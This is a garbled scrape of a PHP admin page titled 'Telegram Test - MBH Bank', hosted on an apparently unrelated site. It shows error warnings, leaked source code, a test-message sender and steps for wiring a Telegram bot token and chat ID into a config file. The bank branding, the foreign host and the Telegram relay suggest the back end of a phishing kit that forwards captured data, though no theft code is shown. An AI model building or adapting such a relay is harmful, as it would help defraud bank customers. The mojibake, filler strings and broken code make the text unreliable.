??? 123123123123 .....................................................................................................................................??? 123123123123 .....................................................................................................................................
Warning: Undefined variable $auth in /home/elquintoelemento/public_html/admin.php on line 546

Warning: Trying to access array offset on null in /home/elquintoelemento/public_html/admin.php on line 546

Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 188

Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 189
๐Ÿงช Test Message\n\n"; $testMessage .= "Time: " . date('Y-m-d H:i:s') . "\n"; $testMessage .= "Server: " . $_SERVER['HTTP_HOST'] . "\n"; $testMessage .= "This is a test from the MBH system."; $sent = sendTelegramMessage($testMessage); if($sent) { $testResult = '
โœ… Message sent successfully!
'; } else { $testResult = '
โŒ Failed to send message. Check logs.
'; } } // Get token info $token = getBotToken(); $chatId = getChatId(); $tokenValid = !empty($token) && strpos($token, 'YOUR_') === false; $chatValid = !empty($chatId) && strpos($chatId, 'YOUR_') === false; ?> Telegram Test - MBH Bank

๐Ÿ“ฑ Telegram Test

Configuration Status

Bot Token: โœ“ Configured
... โœ— Not configured
Chat ID: โœ“ Configured
โœ— Not configured
cURL Extension: โœ“ Available โœ— Not available
JSON Extension: โœ“ Available โœ— Not available
๐Ÿš€ Send Test Message ๐Ÿ  Back to Home

โš ๏ธ How to fix Telegram issues:

  1. Open @BotFather on Telegram
  2. Create new bot: /newbot
  3. Copy the token (looks like: 123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11)
  4. Open your bot and click START
  5. Visit: https://api.telegram.org/bot<TOKEN>/getUpdates
  6. Look for "chat":{"id":123456789 - that's your Chat ID
  7. Edit core/config.php and replace the token and chat ID
๐Ÿ“„ View Today's Log File